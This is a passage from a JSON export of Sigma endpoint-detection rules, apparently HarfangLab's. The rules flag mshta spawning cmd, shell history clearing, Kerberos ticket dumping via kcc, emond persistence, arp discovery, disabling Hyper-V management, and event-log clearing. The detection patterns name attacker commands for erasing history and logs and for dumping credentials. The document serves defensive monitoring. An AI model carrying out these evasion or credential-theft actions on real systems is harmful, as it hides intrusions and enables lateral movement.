127.0.0.1>nul'\n\n exclusion_copy:\n CommandLine:\n - '?:\\Windows\\System32\\cmd.exe /c copy ?:\\\\* ?:\\\\*'\n - '?:\\Windows\\System32\\cmd.exe /c robocopy ?:\\\\* ?:\\\\*'\n\n exclusion_type:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /c type ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*.tmp.ini*'\n\n exclusion_cls:\n CommandLine: '?:\\Windows\\System32\\cmd.exe /C cls'\n\n exclusion_driverpack:\n CommandLine|startswith:\n - '?:\\Windows\\System32\\cmd.exe /c tools\\driverpack-wget.exe *--directory-prefix=?:\\Users\\\\*\\AppData\\Local\\Temp\\beetle-cab\\DriverPack\\audio\\fr http://dl.driverpack.io/'\n - '?:\\Windows\\System32\\cmd.exe /c netsh advfirewall firewall add rule name=DriverPack'\n - '?:\\Windows\\System32\\cmd.exe /c netsh advfirewall firewall delete rule name=DriverPack'\n\n exclusion_ivanti:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files (x86)\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n - '?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\sdistbat.exe|?:\\Program Files\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE|?:\\Program Files\\Ivanti\\EPM Agent\\Shared Files\\residentAgent.exe'\n\n exclusion_bdfacsduet:\n GrandparentImage: '?:\\stratec\\BDFACSDuet\\InstrumentSetup\\IS-Start.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42b184cd-02dd-4a06-9de2-f8424574bac6",
"rule_name": "Cmd Execution via mshta.exe",
"rule_description": "Detects the execution of cmd.exe by mshta.exe.\nMshta can be used to proxy the execution of a malicious JScript that may use the \"WScript.shell\" ActiveX object to run arbitrary commands, which spawns an intermediary \"cmd.exe\".\nIt is recommended to check the spawned process for suspicious activities.\n",
"rule_creation_date": "2021-02-10",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42be5cfc-1e0a-438e-8602-3207fa4956da",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611693Z",
"creation_date": "2026-03-23T11:45:34.611697Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611704Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md",
"https://attack.mitre.org/techniques/T1070/003/"
],
"name": "t1070_003_clear_history_file_linux.yml",
"content": "title: Shell History File Cleared (Linux)\nid: 42be5cfc-1e0a-438e-8602-3207fa4956da\ndescription: |\n Detects the shell history file being removed or truncated.\n Attackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\n It is recommended to investigate the context around this action and the offending process.\n If this action is legitimate and recurrent, it is highly recommended to create a whitelist for it.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md\n - https://attack.mitre.org/techniques/T1070/003/\ndate: 2023/01/03\nmodified: 2025/04/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.003\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_rm:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/dd'\n - '/truncate'\n - '/ln'\n CommandLine|contains:\n - '/root/.history'\n - '/root/.ash_history'\n - '/root/.bash_history'\n - '/root/.tcsh_history'\n - '/root/.sh_history'\n - '/root/.zhistory'\n - '/root/.zsh_history'\n - '/home/*/.history'\n - '/home/*/.ash_history'\n - '/home/*/.bash_history'\n - '/home/*/.tcsh_history'\n - '/home/*/.sh_history'\n - '/home/*/.zhistory'\n - '/home/*/.zsh_history'\n - /fish/fish_history'\n\n selection_shell:\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n CommandLine|contains:\n - '>*/root/.history'\n - '>*/root/.ash_history'\n - '>*/root/.bash_history'\n - '>*/root/.tcsh_history'\n - '>*/root/.sh_history'\n - '>*/root/.zhistory'\n - '>*/root/.zsh_history'\n - '>*/home/*/.history'\n - '>*/home/*/.ash_history'\n - '>*/home/*/.bash_history'\n - '>*/home/*/.tcsh_history'\n - '>*/home/*/.sh_history'\n - '>*/home/*/.zhistory'\n - '>*/home/*/.zsh_history'\n - '>*/fish/fish_history'\n\n # We can't 
match against builtins but we can match against \"sh -c 'history -c'\" and other similar variants\n selection_builtin:\n CommandLine|contains: 'history -c'\n\n exclusion_history:\n CommandLine|contains: '_history -c'\n\n exclusion_stat:\n CommandLine|contains: ' /usr/bin/stat '\n\n exclusion_eclipse_workspace:\n CommandLine|contains: '/org.eclipse.core'\n\n exclusion_tar:\n Image: '/usr/bin/tar'\n\n exclusion_soltr:\n CommandLine|startswith: 'tar --exclude'\n GrandparentImage|startswith:\n - '/usr/sw/var/soltr'\n - '/usr/sw/loads/soltr'\n\n exclusion_neovim:\n CommandLine|contains: 'vimglob() { while [ $# -ge 1 ]; do echo \"$1\"; shift; done }; vimglob >/tmp/'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42be5cfc-1e0a-438e-8602-3207fa4956da",
"rule_name": "Shell History File Cleared (Linux)",
"rule_description": "Detects the shell history file being removed or truncated.\nAttackers may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.\nIt is recommended to investigate the context around this action and the offending process.\nIf this action is legitimate and recurrent, it is highly recommended to create a whitelist for it.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2025-04-02",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1070.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42bf430b-b73f-4376-aab1-4173d80d20f4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617493Z",
"creation_date": "2026-03-23T11:45:34.617496Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617503Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/003/",
"https://attack.mitre.org/techniques/T1558/",
"https://attack.mitre.org/techniques/T1558/003/"
],
"name": "t1564_001_kcc_kerberos_ticket_dump.yml",
"content": "title: Kerberos Ticket Extracted via kcc\nid: 42bf430b-b73f-4376-aab1-4173d80d20f4\ndescription: |\n Detects the usage of kcc to extract a Kerberos Ticket.\n Adversaries may dump kerberos tickets and use them for lateral movement.\n It is recommended to check for other suspicious activities by the parent process.\nreferences:\n - https://attack.mitre.org/techniques/T1555/003/\n - https://attack.mitre.org/techniques/T1558/\n - https://attack.mitre.org/techniques/T1558/003/\ndate: 2024/07/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1555.003\n - attack.t1558\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Kcc\n - classification.macOS.Behavior.CredentialAccess\n - classification.macOS.Behavior.Lateralization\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessName: 'kcc'\n CommandLine|contains:\n - 'dump-credentials'\n - 'copy_cred_cache'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42bf430b-b73f-4376-aab1-4173d80d20f4",
"rule_name": "Kerberos Ticket Extracted via kcc",
"rule_description": "Detects the usage of kcc to extract a Kerberos Ticket.\nAdversaries may dump kerberos tickets and use them for lateral movement.\nIt is recommended to check for other suspicious activities by the parent process.\n",
"rule_creation_date": "2024-07-22",
"rule_modified_date": "2025-04-14",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1555.003",
"attack.t1558"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "42cd8416-c43f-466f-992d-7a756d832d7a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617436Z",
"creation_date": "2026-03-23T11:45:34.617438Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617442Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.xorrior.com/emond-persistence/",
"https://attack.mitre.org/techniques/T1546/014/"
],
"name": "t1546_014_emond_persistence_execution.yml",
"content": "title: Suspicious Process Execution via Emond\nid: 42cd8416-c43f-466f-992d-7a756d832d7a\ndescription: |\n Detects any process spawned by the Event Monitor Daemon (emond, /sbin/emond).\n Adversaries can abuse emond for persistence by placing a rule file in its rules directory so that arbitrary commands run in response to system events, such as system startup or user logon.\n Legitimate child processes of emond are uncommon, so every child process is reported.\n It is recommended to review the emond rule files that triggered the execution, the command line of the child process, and the context in which emond is used on the host.\nreferences:\n - https://www.xorrior.com/emond-persistence/\n - https://attack.mitre.org/techniques/T1546/014/\ndate: 2024/05/15\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.014\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessParentImage: '/sbin/emond'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "42cd8416-c43f-466f-992d-7a756d832d7a",
"rule_name": "Suspicious Process Execution via Emond",
"rule_description": "Detects any process spawned by the Event Monitor Daemon (emond, /sbin/emond).\nAdversaries can abuse emond for persistence by placing a rule file in its rules directory so that arbitrary commands run in response to system events, such as system startup or user logon.\nLegitimate child processes of emond are uncommon, so every child process is reported.\nIt is recommended to review the emond rule files that triggered the execution, the command line of the child process, and the context in which emond is used on the host.\n",
"rule_creation_date": "2024-05-15",
"rule_modified_date": "2025-01-30",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.014"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43289013-d5b5-48ec-bcd4-77826f38f079",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090488Z",
"creation_date": "2026-03-23T11:45:34.090490Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090494Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
"https://www.intrinsec.com/alphv-ransomware-gang-analysis/",
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1016_arp_windows.yml",
"content": "title: Arp Execution (Windows)\nid: 43289013-d5b5-48ec-bcd4-77826f38f079\ndescription: |\n Detects the execution of arp.exe.\n Arp.exe is a legitimate Microsoft binary that can be used by attackers during the discovery phase to gather detailed information about a system's Address Resolution Protocol (ARP) tables.\n It is recommended to analyze the process responsible for the execution of arp.exe to look for malicious content or actions.\nreferences:\n - https://thedfirreport.com/2022/09/26/bumblebee-round-two/\n - https://www.intrinsec.com/alphv-ransomware-gang-analysis/\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/techniques/T1018/\ndate: 2021/05/26\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.t1018\n - attack.s0099\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\arp.exe'\n # Renamed binaries\n - OriginalFileName: 'arp.exe'\n exclusion_commandline:\n CommandLine|contains:\n # Used to edit the table records.\n - '-s'\n - '-d'\n exclusion_explorer:\n ParentImage: '?:\\Windows\\System32\\cmd.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - 
'?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\Windows\\Lenovo\\ImController\\PluginHost86\\Lenovo.Modern.ImController.PluginHost.CompanionApp.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n - '*\\SolarWinds\\SolarWinds.BusinessLayerHost.exe'\n\n exclusion_atera:\n # C:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\n CurrentDirectory: '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools'\n # powershell.exe -File C:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\cde53007-46c2-51a0-8c64-f8da2d10c3d6_IPScan.ps1\n # powershell.exe -File C:\\Windows\\TEMP\\08886e14-da1c-43e3-b4a9-b782f11e8d18_IPScan.ps1\n ParentCommandLine|contains:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\'\n - '_IPScan.ps1'\n\n exclusion_azure_networkwatcher:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c arp -a >> config\\Neighbors.txt'\n GrandparentCommandLine: '?:\\Windows\\system32\\cscript.exe ?:\\Windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_inssider:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\inSSIDer\\app-?.?.?\\inSSIDer.exe'\n\n exclusion_nessus:\n GrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c ?:\\Windows\\System32\\arp.exe -a > ?:\\Windows\\temp\\nessus_????????.txt'\n\n exclusion_netbackup:\n ProcessParentImage|endswith: '\\bpcd.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'Veritas Technologies LLC'\n\n exclusion_lansweeper:\n ProcessParentImage|endswith: '\\LansweeperService.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature|contains: 'Lansweeper NV'\n\n exclusion_netgear:\n ProcessGrandparentImage|endswith: '\\Engage.exe'\n ProcessGrandparentSigned: 'true'\n 
ProcessGrandparentSignature|contains: 'Netgear Inc'\n\n exclusion_ninjarmm:\n ProcessAncestors|contains: '|?:\\Program Files (x86)\\\\*\\NinjaRMMAgent.exe|'\n\n exclusion_espcli:\n ProcessParentCommandLine: '?:\\Windows\\system32\\cmd.exe /c arp -a *>adrmac.txt'\n ProcessGrandparentCommandLine: '.\\espcli_parc'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "43289013-d5b5-48ec-bcd4-77826f38f079",
"rule_name": "Arp Execution (Windows)",
"rule_description": "Detects the execution of arp.exe, including renamed copies identified through the binary's original file name.\nArp.exe is a legitimate Microsoft binary that attackers may use during the discovery phase to enumerate a system's Address Resolution Protocol (ARP) cache and thereby identify other hosts on the local network segment.\nInvocations that modify the ARP table (-s, -d) are not covered by this rule, and a number of management and monitoring agents that run arp.exe legitimately are excluded.\nIt is recommended to analyze the parent process and its command line to determine whether the execution is part of malicious reconnaissance.\n",
"rule_creation_date": "2021-05-26",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016",
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4332ec13-a2db-40c4-8915-d22355e770f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626126Z",
"creation_date": "2026-03-23T11:45:34.626128Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626132Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines",
"https://attack.mitre.org/techniques/T1564/006/"
],
"name": "t1564_006_disable_hyperv_managmement.yml",
"content": "title: Windows Hyper-V Management Disabled\nid: 4332ec13-a2db-40c4-8915-d22355e770f0\ndescription: |\n Detects DISM being used to disable the Windows Hyper-V management tools feature (Microsoft-Hyper-V-Management-Clients) on the running system with the norestart option.\n Disabling only the management clients removes the local tools used to list and inspect virtual machines while the hypervisor role itself stays enabled, so virtual machines that were previously created keep running.\n Attackers have abused this to run hidden virtual machines that host their tooling outside the reach of host-based security agents.\n It is recommended to investigate the parent process to determine whether this action was legitimate, and to check whether Hyper-V is enabled and virtual machines are present on the host.\nreferences:\n - https://www.bitdefender.com/en-us/blog/businessinsights/curly-comrades-evasion-persistence-hidden-hyper-v-virtual-machines\n - https://attack.mitre.org/techniques/T1564/006/\ndate: 2025/11/12\nmodified: 2025/12/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1564.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.ImpairDefenses\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - Image|endswith: '\\Dism.exe'\n - OriginalFileName: 'DISM.EXE'\n\n selection_command:\n CommandLine|contains|all:\n - ' ?online'\n - ' ?disable-feature'\n - ' ?microsoft-hyper-v-Management-clients'\n - ' ?norestart '\n\n exclusion_ldplayer:\n - ProcessParentImage: '?:\\LDPlayer\\LDPlayer9\\dnrepairer.exe'\n - ProcessParentOriginalFileName: 'repairer.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Shanghai Baizhi Network Technology Co., Ltd.'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4332ec13-a2db-40c4-8915-d22355e770f0",
"rule_name": "Windows Hyper-V Management Disabled",
"rule_description": "Detects DISM being used to disable the Windows Hyper-V management tools feature (Microsoft-Hyper-V-Management-Clients) on the running system with the norestart option.\nDisabling only the management clients removes the local tools used to list and inspect virtual machines while the hypervisor role itself stays enabled, so virtual machines that were previously created keep running.\nAttackers have abused this to run hidden virtual machines that host their tooling outside the reach of host-based security agents.\nIt is recommended to investigate the parent process to determine whether this action was legitimate, and to check whether Hyper-V is enabled and virtual machines are present on the host.\n",
"rule_creation_date": "2025-11-12",
"rule_modified_date": "2025-12-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1564.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "43a740ac-2e54-4653-84a7-349b469a0a35",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627609Z",
"creation_date": "2026-03-23T11:45:34.627611Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627615Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1070/001/"
],
"name": "t1070_001_clear_windows_application_log.yml",
"content": "title: Windows Application Log Cleared\nid: 43a740ac-2e54-4653-84a7-349b469a0a35\ndescription: |\n Detects when one of the Windows application logs is cleared.\n Windows Event Logs are a record of a computer's alerts and notifications.\n Adversaries may clear Windows Event Logs to hide the activity of an intrusion.\n It is recommended to investigate the process responsible for this action as well as to look for suspicious activities on the host preceding the clearing of the logs.\nreferences:\n - https://attack.mitre.org/techniques/T1070/001/\ndate: 2021/04/27\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n service: system\ndetection:\n selection:\n EventID: 104\n Source: Microsoft-Windows-Eventlog\n ProcessImage|contains: '?'\n\n # This is handled by the rule 5cf9b4f6-6f3b-4d0b-a178-9570cce9693d\n filter_wevtutil_1:\n - ProcessImage|endswith: '\\wevtutil.exe'\n - ProcessOriginalFileName: 'wevtutil.exe'\n\n filter_wevtutil_2:\n ProcessCommandLine|contains:\n - ' clear-log '\n - ' cl '\n\n filter_ps_1:\n - ProcessImage|endswith: '\\powershell.exe'\n - ProcessOriginalFileName: 'PowerShell.EXE'\n\n filter_ps_2:\n - ProcessCommandLine|contains:\n - ' Clear-EventLog '\n - ' Remove-EventLog '\n\n filter_wmic_1:\n - ProcessImage|endswith: '\\wmic.exe'\n - ProcessOriginalFileName: 'wmic.exe'\n\n filter_wmic_2:\n ProcessCommandLine|contains: ' ClearEventLog'\n\n exclusion_channel:\n Channel:\n - 'ModemAuthenticatorLog'\n - 'Microsoft-Exchange-ManagedAvailability/ThrottlingConfig'\n\n exclusion_image:\n - ProcessImage:\n - '?:\\Program Files\\CCleaner\\CCleaner64.exe'\n - '?:\\Windows\\System32\\Sysprep\\sysprep.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client 
Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client\\TouchpointAnalyticsClientService.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client\\TouchpointGpuInfo.exe'\n - '?:\\Program Files (x86)\\Panda Security\\WAC\\PSANCU.exe'\n - '?:\\Windows\\System32\\mmc.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Program Files (x86)\\Glary Utilities\\TracksEraser.exe'\n - ProcessParentImage:\n - '?:\\Program Files\\CCleaner\\CCleaner64.exe'\n - '?:\\Program Files (x86)\\Citrix\\Workspace Environment Management Agent\\Citrix.Wem.Agent.Service.exe'\n - ProcessGrandparentImage:\n - '?:\\Program Files\\ATERA Networks\\AteraAgent\\Packages\\AgentPackageSystemTools\\AgentPackageSystemTools.exe'\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LenovoWelcome\\x86\\LenovoWelcomeTask.exe'\n - '*\\CLEANMGR+\\Cleanmgr+.exe'\n - '*\\CLEANMGR+\\cleanmgrplus\\Cleanmgr+.exe'\n - '*\\Cleanmgr+ v*\\Cleanmgr+.exe'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '\\PrivaZer\\PrivaZer v*.exe|'\n - '?:\\Program Files (x86)\\F-Secure\\Client Security\\UltralightInstaller\\ul_*.exe'\n - '?:\\Program Files (x86)\\Panda Security\\Panda Aether Agent\\AgentSvc.exe'\n\n exclusion_dism:\n ProcessImage|endswith: '\\Dism++x64.exe'\n ProcessOriginalFileName: 'Dism++.exe'\n\n exclusion_ccm:\n - ProcessCommandLine|contains: '?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n - ProcessGrandparentImage: '?:\\Windows\\CCM\\TSManager.exe'\n\n exclusion_bis:\n ProcessGrandparentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\PrepareBaseImage.cmd'\n - 'Powershell.exe -WindowStyle Maximize -file ?:\\Program Files (x86)\\Base Image Script Framework (BIS-F)\\framework\\PrepBISF_Start.ps1'\n\n exclusion_lenovo:\n - ProcessParentImage: 
